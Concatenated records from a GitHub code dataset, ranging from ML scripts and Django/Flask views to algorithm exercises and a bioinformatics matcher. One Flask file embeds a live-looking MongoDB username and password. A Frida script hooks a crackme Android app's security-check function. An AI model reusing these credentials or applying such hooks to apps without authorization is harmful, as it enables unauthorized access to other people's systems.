parser.parse_args()\r\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\r\n\r\nif not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\ntorch.manual_seed(args.seed)\r\nif args.cuda:\r\n torch.cuda.manual_seed(args.seed)\r\n\r\nbatch_size = 128\r\n\r\n\r\n\r\ntest_dataset = SVHN(csv_file=\"./hw3_data/digits/svhn/test.csv\", root_dir=\"./hw3_data/digits/svhn/test\",transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\r\n ]))\r\n\r\n\r\n\r\ntrain_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True)\r\n\r\n\r\n\r\n\r\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\r\n\r\nmodel = DANN_Neural_Network()\r\n\r\nmodel_root = os.path.join('.','dann_NN_models/mnist_to_svhn')\r\n\r\nNN_test = torch.load(os.path.join(\r\n model_root, 'domainadaptation2_model28-0' + '.pth'\r\n ))\r\ncst = 0\r\nif args.cuda:\r\n model.cuda()\r\n\r\ndef generate_feature():\r\n model.eval()\r\n cnt = 0\r\n out_target = []\r\n out_data = []\r\n out_output =[]\r\n for data, target in train_loader:\r\n cnt += len(data)\r\n print(\"processing: %d/%d\" % (cnt, len(train_loader.dataset)))\r\n if args.cuda:\r\n data, target = data.cuda(), target.cuda()\r\n data, target = Variable(data, volatile=True), Variable(target)\r\n output = model(data)\r\n output_np = output.data.cpu().numpy()\r\n target_np = target.data.cpu().numpy()\r\n data_np = data.data.cpu().numpy()\r\n\r\n out_output.append(output_np)\r\n out_target.append(target_np[:, np.newaxis])\r\n out_data.append(np.squeeze(data_np))\r\n\r\n\r\n output_array = np.concatenate(out_output, axis=0)\r\n target_array = np.concatenate(out_target, axis=0)\r\n data_array = np.concatenate(out_data, axis=0)\r\n\r\n np.save(os.path.join(\"./tsne\", 'output.npy'), output_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'target.npy'), target_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'data.npy'), data_array, allow_pickle=False)\r\n\r\ngenerate_feature()","repo_name":"amelieclautour/DLCV2019-Hw3-GAN","sub_path":"tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30658834279","text":"n = int(input())\nd = dict()\nl = []\n\nfor i in range(n-1):\n m = int(input())\n for j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n else:\n d[s] += 1\n\nm = int(input())\nfor j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n elif d[s] == n-1:\n l.append(s)\n\nprint(len(l))\nfor v in l:\n print(v)\nprint(len(d))\nfor k in d:\n print(k)","repo_name":"newRational/Yandex-algorithms-1.0","sub_path":"3/I/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"42572252483","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\n\n\ndef index(request):\n\n if request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to=\"/events/\")\n else:\n template = loader.get_template('home/index.html')\n context = {\n 'title': 'Welcome to Send Cloud BBQ Planner'\n }\n return HttpResponse(template.render(context, request))\n","repo_name":"pouyaist/BBQ_planner","sub_path":"bbq_planner/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4465650616","text":"from math import ceil\n\ndef calc_parking_costs(hours):\n return hours * 1.5;\n\ndef calc_parking_costs_detailed(hours):\n if hours <= 8:\n total = 0;\n\n if hours > 0: \n total += 2;\n hours -= 1;\n \n if hours > 0:\n total += 1.5;\n hours -= 1;\n\n if hours > 0:\n total += hours * 1;\n\n return total;\n else:\n # the parking time is \"a day or more\"\n return ceil(hours / 24) * 10;\n\ndef is_coin_or_note(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n\n return money in correct_values;\n\ndef calc_returned_coins_and_notes(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n correct_values.sort(reverse=True);\n\n returned_values = {};\n\n for correct_value in correct_values:\n while money >= correct_value:\n money -= correct_value;\n if not correct_value in returned_values.keys():\n returned_values[correct_value] = 1;\n else:\n returned_values[correct_value] += 1;\n\n return returned_values;\n\ndef output_returned_money(returned_values: dict):\n for money_value, amount in returned_values.items():\n print(\"Sie bekommen {}x {} EUR.\".format(amount, money_value));\n\n\nhours = ceil(float(input(\"Geparkte Stunden: \")));\n\ncurrent_cost = calc_parking_costs_detailed(hours);\n\nprint(\"Es werden {} Euro fällig\".format(current_cost));\n\ntotal_paid = 0;\ntotal_return = 0;\nwhile current_cost > total_paid:\n paid_money_input = input(\"Wieviel zahlen Sie ein: \");\n\n try:\n paid_money = float(paid_money_input);\n\n total_paid += paid_money;\n\n if current_cost > total_paid:\n print(\"Sie müssen noch {} EUR bezahlen.\".format(current_cost));\n else:\n total_return = total_paid - current_cost;\n break;\n except:\n print(\"Vorgang abgebrochen.\");\n total_return = total_paid;\n\nif total_return > 0:\n returned_values = calc_returned_coins_and_notes(total_return);\n output_returned_money(returned_values);\n\nprint(\"Vielen Dank und auf Wiedersehen\");\n","repo_name":"TnTGamesTV/python-lesson","sub_path":"lesson3/A3_3242157.py","file_name":"A3_3242157.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74140031720","text":"\nimport bisect\nimport os\nimport json\nimport glob\n\nPROBLEM_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nDATA_DIR = f'{PROBLEM_DIR}/data'\nRESULTS_DIR = f'{PROBLEM_DIR}/results'\n\ndef loadProblems(fn):\n ret = {}\n fp = open(fn, 'r')\n \n num_isoforms, delta = [int(s) for s in fp.readline().rstrip().split(' ')]\n isoforms = []\n for x in range(0, num_isoforms):\n isoforms.append(fp.readline().rstrip())\n \n num_reads = int(fp.readline())\n reads = []\n for x in range(0, num_reads):\n reads.append(fp.readline().rstrip())\n\n fp.close()\n\n ret['isoforms'] = isoforms\n ret['reads'] = reads\n ret['delta'] = delta\n\n return ret\n\ndef parseRanges(s):\n regions = s.split(',')\n ret = []\n for r in regions:\n s, e = r.split('-')\n ret.append((int(s), int(e)))\n return ret\n\ndef solveProblem(problem):\n #Load the problem dict (or list of problem dicts)\n isoforms = problem['isoforms']\n reads = problem['reads']\n delta = problem['delta']\n num_isoforms = len(isoforms)\n\n #initial answers are all -1 and 0\n first_match = [-1]*len(reads)\n num_match = [0]*len(reads)\n\n #strategy: iterate through each isoform, compare to the read to mark as a match or not; first find goes into find bucket\n print('Preprocessing reads...')\n parsed_reads = [parseRanges(r) for r in reads]\n\n print('Isoform iterating...')\n for iso_num, isoform in enumerate(isoforms):\n print(f'\\tIsoform #{iso_num} / {num_isoforms}...')\n iso_ranges = parseRanges(isoform)\n #print(iso_ranges)\n for read_num, pr in enumerate(parsed_reads):\n #print(pr)\n #compare them here\n pr_start = pr[0]\n ind = bisect.bisect(iso_ranges, pr_start)\n \n initial_check = max(0, ind-1)\n maximal_check = min(len(iso_ranges), ind+1)\n \n initial_range = -1\n for si in range(initial_check, maximal_check):\n curr_range = iso_ranges[si]\n if (pr_start[0] >= curr_range[0]-delta and\n abs(pr_start[1] - curr_range[1]) <= delta):\n #this is the initial range\n initial_range = si\n break\n \n if initial_range != -1 and (initial_range+len(pr) <= len(iso_ranges)):\n #this is a candidate, check all the in-between regions\n mismatch = False\n for offset in range(1, len(pr)-1):\n pr_range = pr[offset]\n curr_range = iso_ranges[initial_range+offset]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n abs(pr_range[1] - curr_range[1]) <= delta):\n #still good\n pass\n else:\n mismatch = True\n break\n\n #TODO: finally check the tail region\n pr_range = pr[-1]\n curr_range = iso_ranges[initial_range+len(pr)-1]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n pr_range[1] <= curr_range[1]+delta):\n pass\n else:\n mismatch = True\n\n if not mismatch:\n num_match[read_num] += 1\n if first_match[read_num] == -1:\n first_match[read_num] = iso_num\n\n #exit()\n\n print('Getting results...')\n results = {\n 'first_match' : first_match,\n 'num_match' : num_match\n }\n return results\n \ndef writeResults(fn, all_results):\n fp = open(fn, 'w+')\n first_match = all_results['first_match']\n num_match = all_results['num_match']\n for i, fm in enumerate(first_match):\n fp.write(f'{fm} {num_match[i]}\\n')\n fp.close()\n\nif __name__ == '__main__':\n #there are usually multiple per problem\n all_filenames = sorted(glob.glob(f'{DATA_DIR}/*.txt'))\n starting_problem = 6\n ending_problem = 6\n\n if not os.path.exists(RESULTS_DIR):\n os.makedirs(RESULTS_DIR)\n\n #go through each ones\n for problem in range(starting_problem, ending_problem+1):\n #filenames below might need to change per problem\n print(f'Analyzing problem set #{problem}...')\n #fn = f'{DATA_DIR}/{problem}.txt'\n fn = all_filenames[problem]\n fno = f'{RESULTS_DIR}/{problem}.txt'\n\n #load the problems for this set\n problems = loadProblems(fn)\n\n #generate results for each one\n all_results = solveProblem(problems)\n\n #finally save the results\n writeResults(fno, all_results)\n","repo_name":"holtjma/bio_contest_2021","sub_path":"problem_3.6/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"}
+{"seq_id":"12370855658","text":"from random import sample\n\nimport math\nimport requests\nfrom flask import jsonify\nfrom flask_restx import Resource, Namespace, fields\nfrom pymongo import MongoClient\n\n# define namespace\nns = Namespace('ucb', description='ucb operations')\n\n\n# MongoDB 연결 설정\nmongodb_uri = \"mongodb+srv://p4dsteam6:team6@cluster0.yvkcbg6.mongodb.net/\"\nclient = MongoClient(mongodb_uri)\ndb = client['mindmapDB']\ncollections = {\n 'marketer': db['marketer_ucb'],\n 'developer': db['developer_ucb'],\n 'designer': db['designer_ucb'],\n}\n\n\ndef get_db():\n client = MongoClient(mongodb_uri)\n db = client['mindmapDB']\n return db\n\n\ndef get_collection(user_type):\n if user_type in collections:\n db = get_db()\n return db[user_type+'_ucb']\n\n\ndef related_word(word, limit=100):\n try:\n word = word.lower()\n url = f'http://api.conceptnet.io/c/en/{word}?rel=/r/RelatedTo&limit={limit}'\n response = requests.get(url)\n response.raise_for_status() # Raises stored HTTPError, if one occurred.\n data = response.json()\n except (requests.HTTPError, ValueError) as err:\n print(f'An error occurred: {err}')\n return []\n else:\n related_words = []\n for item in data['edges']:\n if item['rel']['label'] == 'RelatedTo':\n related = item['start']['label'].lower() if item['start']['label'].lower() != word else item['end']['label'].lower()\n if related not in related_words:\n related_words.append(related)\n return related_words\n\n\ndef store_word_and_related_words(word, user_type, limit=100):\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n related_words = related_word(word, limit)\n for a_word in related_words:\n doc = collection.find_one({\"word\": a_word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n\ndef center_word(word, user_type, num_samples=10):\n store_word_and_related_words(word, user_type, limit=100)\n words = related_word(word, limit=100)\n return sample(words, num_samples)\n\n\ndef get_word_params(word, user_type):\n \"\"\"\n Get the parameters of a word for Thompson Sampling from the database.\n If the word does not exist in the database, initialize it with 1 success and 1 failure.\n \"\"\"\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n else:\n params = doc[\"params\"]\n return params\n\n\ndef update_word_params(word, user_type, success):\n \"\"\"\n Update the parameters of a word for Thompson Sampling in the database.\n If success is True, increment the successes of the word.\n If success is False, increment the failures of the word.\n \"\"\"\n collection = get_collection(user_type)\n params = get_word_params(word, user_type)\n if success:\n params[\"successes\"] += 1\n else:\n params[\"failures\"] += 1\n collection.update_one({\"word\": word}, {\"$set\": {\"params\": params}})\n\n\ndef process_feedback(recommended_words, user_type, selected_word):\n \"\"\"\n Process the feedback of a user.\n If the selected word is in the recommended words, consider it a success for that word.\n \"\"\"\n success = (selected_word in recommended_words)\n update_word_params(selected_word, user_type, success)\n\n\ndef get_ucb(total, success, num_samples, c):\n \"\"\"\n Calculate the Upper Confidence Bound (UCB)\n \"\"\"\n if success == 0:\n return float('inf')\n average = success / total\n ucb = average + math.sqrt((c * math.log(num_samples)) / success)\n return ucb\n\n\ndef recommend_words_ucb(user_type, c, num_recommendations=10):\n \"\"\"\n Recommend a list of words using Upper Confidence Bound (UCB)\n \"\"\"\n collection = get_collection(user_type)\n words = collection.find({})\n word_samples = []\n total_samples = 0\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n total_samples += params[\"successes\"] + params[\"failures\"]\n\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n ucb = get_ucb(params[\"successes\"] + params[\"failures\"], params[\"successes\"], total_samples, c)\n word_samples.append((word, ucb))\n\n word_samples.sort(key=lambda x: x[1], reverse=True)\n recommended_words = [word for word, ucb in word_samples[:num_recommendations]]\n return recommended_words\n\n\n@ns.route('/center//')\n@ns.doc({'parameters': [{'name': 'word', 'in': 'path', 'type': 'string', 'required': True},\n {'name': 'user_type', 'in': 'path', 'type': 'string', 'required': True}]})\nclass centerWord(Resource):\n def get(self, word, user_type):\n suggestions = center_word(word, user_type)\n return jsonify(suggestions)\n\n\nlist_item_model = ns.model('ListItem', {\n 'center_word': fields.String(required=True, description='Center word'),\n 'user_type': fields.String(required=True, description='User type')\n})\n\n\n@ns.route('/human/')\n@ns.doc({'parameters': [{'name': 'choice_word', 'in': 'path', 'type': 'string', 'required': True}]})\nclass humanFeedback(Resource):\n @ns.expect(list_item_model)\n def post(self, choice_word, c):\n recommended_words = recommend_words_ucb(ns.payload['user_type'], c, num_recommendations=10)\n process_feedback(recommended_words, ns.payload['user_type'], choice_word)\n return jsonify(recommended_words)","repo_name":"GSDSProject/project","sub_path":"home/views/word/similarWord_ucb.py","file_name":"similarWord_ucb.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"165873909","text":"import numpy as np\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Dense, Input\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as plt\nimport csv\nfrom keras import backend as K\nimport keras\nfrom keras.models import load_model\nimport tensorflow as tf\n# def getSample(path):\n\t# label = []\n\t# input = []\n\t# with open(path, 'r', encoding='utf-8') as data:\n\t\t# read = csv.reader(data)\n\t\t# first_skip=True\n\t\t# for line in read:\n\t\t\t# if first_skip:\n\t\t\t\t# first_skip=False\n\t\t\t\t# continue\n\t\t\t# #one_hot=np.zeros(output_size)\n\t\t\t# #one_hot[int(line[0])]=1\n\t\t\t\n\t\t\t# label.append(int(line[0]))\n\t\t\t# raw = []\n\t\t\t# for i in line[1:]:\n\t\t\t\t# num=float(i)\n\t\t\t\t# if num>0:\n\t\t\t\t\t# raw.append(num)\n\t\t\t\t# else:\n\t\t\t\t\t# raw.append(0)\n\t\t\t# raw=np.array(raw)\n\t\t\t# raw=raw/np.average(raw)\n\t\t\t# input.append(raw)\n\t# return np.array(input),np.array(label)\n\n# x,y = getSample(\"sample_14L_Amptitute_0529.csv\")\n# # x,y = getSample(\"sample_mid.csv\")\n# print(np.shape(x), np.shape(y))\n\n\noutput_size=5 #類別數\ninput_size = 8192 #輸入Feature大小\nClassSampleNum = 240 #每個類別的樣本數\nTestSetNum = 40\nf_min = 150\nf_max = 70000\nResolution = 140000 / 16384\ndef getSample(path):\n\tlabel = []\n\tinput = []\n\twith open(path, 'r', encoding='utf-8') as data:\n\t\tread = csv.reader(data)\n\t\tfirst_skip=True\n\t\tfor line in read:\n\t\t\tif first_skip:\n\t\t\t\tfirst_skip=False\n\t\t\t\tcontinue\n\t\t\t#one_hot=np.zeros(output_size)\n\t\t\t#one_hot[int(line[0])]=1\n\t\t\t\n\t\t\tlabel.append(int(line[0]))\n\t\t\traw = []\n\t\t\tfor i in line[1::]:\n\t\t\t\tnum=float(i)\n\t\t\t\tif num>0:\n\t\t\t\t\traw.append(num)\n\t\t\t\telse:\n\t\t\t\t\traw.append(0)\n\t\t\traw=np.array(raw)\n\t\t\traw=raw/np.average(raw)\n\t\t\tinput.append(raw)\n\treturn np.array(input),np.array(label)\n\nx,y = getSample(\"sample.csv\")\nstd_x = np.std(x)\nmean_x = np.mean(x)\nx = (x-mean_x)/std_x\nprint(x.shape)\nprint(y.shape) \n\ndef Reorganize(x):\n x = np.reshape(x, (len(x), 8192))\n x_mean_col = np.mean(x , axis = 0)\n print(x_mean_col)\n x_mean = np.mean(x_mean_col[int((150/Resolution))::])*0.4\n print(x_mean)\n f = -Resolution\n flag = 0\n freq = []\n Idx = []\n #Select region\n print(\"Select region\")\n for i in range(input_size):\n f += Resolution\n if f > f_min and x_mean_col[i] > x_mean:\n if flag == 0:\n flag = 1\n freq.append([f])\n Idx.append([i])\n if f > f_min and x_mean_col[i] < x_mean:\n if flag == 1:\n flag = 0\n freq[len(freq)-1].append(f)\n Idx[len(Idx)-1].append(i)\n \n #merge\n print(\"merge\")\n j=0\n freq = np.array(freq)\n Idx = np.array(Idx)\n for i in range(len(freq)):\n if i == 0:\n continue\n if freq[j+1][0] - freq[j][1] < 300:\n freq[j][1] = freq[j+1][0]\n Idx[j][1] = Idx[j+1][0]\n freq = np.delete(freq, j+1, 0)\n Idx = np.delete(Idx, j+1, 0)\n else:\n j += 1\n \n #Reorganize\n print(\"Reorganize\")\n new_x = []\n for i in range(output_size*ClassSampleNum):\n new_x.append([])\n for idx in Idx:\n new_x[i].extend(x[i][idx[0]:idx[1]])\n \n # plt.plot(new_x[0][0:2369])\n # plt.title(\"Feature Map\")\n # plt.xlabel(\"Feature point\")\n # plt.ylabel(\"Amplitude\")\n # plt.show()\n \n new_x = np.reshape(new_x,(len(new_x), len(new_x[0])))\n print(np.shape(new_x))\n print(\"Freq. region : \")\n print(freq)\n print(Idx)\n \n # x_label = np.reshape(freq,(len(freq)*2))\n # y_label = np.ones(len(x_label))\n # plt.plot(np.arange(8191)*(Resolution)+Resolution, x_mean_col)\n # plt.bar(x_label,10,100, color='r')\n # plt.plot([0,70000], [x_mean, x_mean])\n # plt.xlabel(\"Frequency\")\n # plt.ylabel(\"Amplitude\")\n # plt.legend([\"Signal\", \"Threshold\", \"Select_Region\"])\n # plt.show()\n return new_x, len(new_x[0])\n \n# x, input_size = Reorganize(x)\n\ndef Greedy(evaluate_result, Model_num, sample_num, G_index = None, Threshold = None):\n TP=0\n TN=0\n FP=0\n FN=0\n\n if Threshold == None:\n sort_lose = np.sort(evaluate_result)\n Threshold = sort_lose[Model_num][G_index]\n \n for i,lose_ in enumerate(evaluate_result[Model_num]):\n if lose_ > Threshold: ##樣本lose大於當前閥值,即判定為不合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n FP += 1\n else:##實際為不合格\n TP += 1\n else: ##樣本lose小於當前閥值,即判定為合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n TN += 1\n else: #實際為不合格\n FN += 1\n TPR = TP/(FN+TP)\n FPR = FP/(FP+TN)\n PRE = TP/(TP+FP)\n ACC = (TP+TN)/(TP+TN+FP+FN)\n \n return TPR, FPR, PRE, ACC, TP, TN, FP, FN\n\npred_Data_test = []\npred_Data_train = []\nfor i in range(output_size*ClassSampleNum):\n if (i%ClassSampleNum >= ClassSampleNum-TestSetNum):\n pred_Data_test.append([x[i]])\n else:\n pred_Data_train.append([x[i]])\npred_Data_test = np.array(pred_Data_test)\npred_Data_train = np.array(pred_Data_train)\nprint(np.shape(pred_Data_test))\n\n##讀取所有模型\nclass_model = []\nfor i in range(output_size):\n class_model.append(load_model('./AE_Model/model_'+repr(i)+'/model_'+repr(i)+'.h5'))\n # class_model.append(tf.keras.models.load_model(\"model_\"+repr(i)+\".h5\"))\n \n##跑lose\nevaluate_result_test = []\nevaluate_result_train = []\nfor i in range(output_size):\n cc = []\n for j in range(output_size*TestSetNum):\n cc.append(class_model[i].evaluate(pred_Data_test[j],pred_Data_test[j])) ## test set\n evaluate_result_test.append(cc)\n \n cc = []\n for j in range((ClassSampleNum-TestSetNum)*output_size):\n cc.append(class_model[i].evaluate(pred_Data_train[j],pred_Data_train[j])) ## train set\n evaluate_result_train.append(cc)\nprint(\"loss :\", evaluate_result_train[0][0])","repo_name":"hello5949/PhoneLock","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39751273523","text":"import glob\nimport numpy as np\nimport os\nimport tqdm\n\n# Import params\nfrom params import *\n\n#############################################################\n# LOAD IMAGE DIRS AND WORD NUMBERS\n#############################################################\n\ndef load_image_dirs_and_word_numbers(trainValSpeakersList = [1, 2, 3, 4, 5, 6, 7, 9],\n valSplit = 0.1,\n siList = [10, 11]):\n # TRAIN AND VAL\n trainDirs = []\n trainWordNumbers = []\n valDirs = []\n valWordNumbers = []\n np.random.seed(29)\n\n # For each speaker\n for speaker in sorted(tqdm.tqdm(trainValSpeakersList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n # List of all videos for each speaker\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n totalNumOfImages = len(vidDirs)\n # To shuffle directories before splitting into train and validate\n fullListIdx = list(range(totalNumOfImages))\n np.random.shuffle(fullListIdx)\n # Append training directories\n for i in fullListIdx[:int((1 - valSplit) * totalNumOfImages)]:\n for j in range(wordsPerVideo):\n trainDirs.append(vidDirs[i])\n trainWordNumbers.append(j)\n # Append val directories\n for i in fullListIdx[int((1 - valSplit) * totalNumOfImages):]:\n for j in range(wordsPerVideo):\n valDirs.append(vidDirs[i])\n valWordNumbers.append(j)\n\n # Numbers\n print(\"No. of training words: \" + str(len(trainDirs)))\n print(\"No. of val words: \" + str(len(valDirs)))\n\n # SPEAKER INDEPENDENT\n siDirs = []\n siWordNumbers = []\n for speaker in sorted(tqdm.tqdm(siList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n for i in fullListIdx:\n for j in range(wordsPerVideo):\n siDirs.append(vidDirs[i])\n siWordNumbers.append(j)\n\n # Numbers\n print(\"No. of speaker-independent words: \" + str(len(siDirs)))\n\n # Return\n return trainDirs, trainWordNumbers, valDirs, valWordNumbers, siDirs, siWordNumbers\n","repo_name":"voletiv/GRIDcorpus-experiments","sub_path":"gen-images-and-words/load_image_dirs_and_word_numbers.py","file_name":"load_image_dirs_and_word_numbers.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"}
+{"seq_id":"2637201026","text":"#나무 자르기 (실버2) 231217 ✳ 4628ms ... 시간 너무 오래 걸림\ndef solution() :\n import sys\n input = sys.stdin.readline\n\n n, m = map(int, input().split()) #나무의 수, 상근이가 가질 나무의 길이\n tree_list = list(map(int, input().split())) #나무의 높이\n\n start = 0\n end = max(tree_list) #가장 긴 나무 높이\n\n while start <= end :\n mid = (start+end) // 2\n total = 0\n\n for tree in tree_list :\n #나무 높이가 절단기 높이보다 큰 경우\n if tree > mid :\n total += (tree - mid) #나무 자름\n\n #자른 나무들의 길이가 m 이상인 경우\n if total >= m :\n start = mid + 1\n #m보다 작은 경우\n else :\n end = mid - 1\n\n print(end)","repo_name":"eun417/replit_test","sub_path":"algorithm/BinarySearch/BAEKJOON/bj_31.py","file_name":"bj_31.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"13553495330","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views import View\n\nfrom baseapp.models.grafico import Grafico\n\n\nclass ListaGerarAjaxView(View):\n '''\n Adiciona um pedido via AJAX.\n :URl: http://ip_servidor/pedido/cadastrar/\n '''\n\n def get(self, request, **kwargs):\n '''\n :param request:\n :param id:\n :param kwargs: id do produto\n :return: HTML do modal\n '''\n context = {}\n data = {}\n data['form_is_valid'] = True\n data['id'] = self.kwargs.get('pk')\n data['titulo'] = 'chamados'\n data['tipo'] = 'bar'\n lista = get_object_or_404(Grafico, pk=self.kwargs.get('pk'))\n\n consulta = my_custom_sql(lista.sql)\n print(consulta)\n data['titulo'] = lista.nome\n lista = []\n for item in consulta:\n lista.append(item[0])\n data['lista'] = lista\n data['valor'] = lista\n\n return JsonResponse(data)\n\n\ndef my_custom_sql(consulta):\n from django.db import connection\n cursor = connection.cursor()\n cursor.execute(consulta)\n row = cursor.fetchall()\n return row\n","repo_name":"thiagolcdeoliveira/matrix","sub_path":"baseapp/views/ListaGerarAjax.py","file_name":"ListaGerarAjax.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"29691098542","text":"import sys\n\nimport frida\n\n\ndef on_message(message, data):\n if message['type'] == 'send':\n\n print(\" {0}\".format(message['payload']))\n else:\n print(message)\n\n\nthread_backtracer = \"\"\"\n//打印lib线程调用的堆栈,显示堆栈地址成功,map名字失败\nJava.perform(function(){\n\n var f = Module.findExportByName('libcrackme.so', 'Java_com_yaotong_crackme_MainActivity_securityCheck');\n \n Interceptor.attach(f, {\n onEnter: function(args){\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE))\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromaddress))\n }\n })\n \n\n\n\n});\n\n\n\"\"\"\n\nif __name__ == '__main__':\n process = frida.get_device_manager().enumerate_devices()[-1].attach(\n \"com.yaotong.crackme\")\n script = process.create_script(thread_backtracer)\n script.on('message', on_message)\n script.load()\n sys.stdin.read()\n","repo_name":"kylezb/useful","sub_path":"examples/useful_python/examples/frida_hook/frida_studuy.py","file_name":"frida_studuy.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"37615916628","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport urllib\nimport urlparse\nimport logging\nimport re\n\nfrom google.appengine.runtime.apiproxy_errors import CapabilityDisabledError\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n\nimport webapp2\n\nimport devpanel\nimport bulk_update.handler\nimport request_cache\nfrom gae_mini_profiler import profiler\nfrom gae_bingo.middleware import GAEBingoWSGIMiddleware\nimport autocomplete\nimport coaches\nimport knowledgemap\nimport consts\nimport youtube_sync\nimport warmup\nimport library\nimport homepage\nimport nl\nimport nl_report\n\nimport search\n\nimport request_handler\nfrom app import App\nimport util\nimport user_util\nimport exercise_statistics\nimport activity_summary\nimport exercises\nimport dashboard\nimport exercisestats.report\nimport exercisestats.report_json\nimport github\nimport paypal\nimport smarthistory\nimport goals.handlers\n\nimport models\nfrom models import UserData, Video, Playlist, VideoPlaylist, ExerciseVideo, UserVideo, VideoLog\nfrom discussion import comments, notification, qa, voting\nfrom about import blog, util_about\nfrom phantom_users import util_notify\nfrom badges import util_badges, custom_badges\nfrom mailing_lists import util_mailing_lists\nfrom profiles import util_profile\nfrom custom_exceptions import MissingVideoException\nfrom templatetags import user_points\nfrom oauth_provider import apps as oauth_apps\nfrom phantom_users.phantom_util import create_phantom, get_phantom_user_id_from_cookies\nfrom phantom_users.cloner import Clone\nfrom counters import user_counter\nfrom notifications import UserNotifier\nfrom nicknames import get_nickname_for\nfrom image_cache import ImageCache\nfrom api.auth.xsrf import ensure_xsrf_cookie\nimport redirects\nimport robots\nfrom gae_bingo.gae_bingo import bingo\n\nclass VideoDataTest(request_handler.RequestHandler):\n\n @user_util.developer_only\n def get(self):\n self.response.out.write('')\n videos = Video.all()\n for video in videos:\n self.response.out.write('
Title: ' + video.title)\n\n\nclass DeleteVideoPlaylists(request_handler.RequestHandler):\n# Deletes at most 200 Video-Playlist associations that are no longer live. Should be run every-now-and-then to make sure the table doesn't get too big\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(200)\n video_playlists_to_delete = []\n for video_playlist in all_video_playlists:\n if video_playlist.live_association != True:\n video_playlists_to_delete.append(video_playlist)\n db.delete(video_playlists_to_delete)\n\n\nclass KillLiveAssociations(request_handler.RequestHandler):\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(100000)\n for video_playlist in all_video_playlists:\n video_playlist.live_association = False\n db.put(all_video_playlists)\n\ndef get_mangled_playlist_name(playlist_name):\n for char in \" :()\":\n playlist_name = playlist_name.replace(char, \"\")\n return playlist_name\n\nclass ViewVideo(request_handler.RequestHandler):\n\n @ensure_xsrf_cookie\n def get(self, readable_id=\"\"):\n\n # This method displays a video in 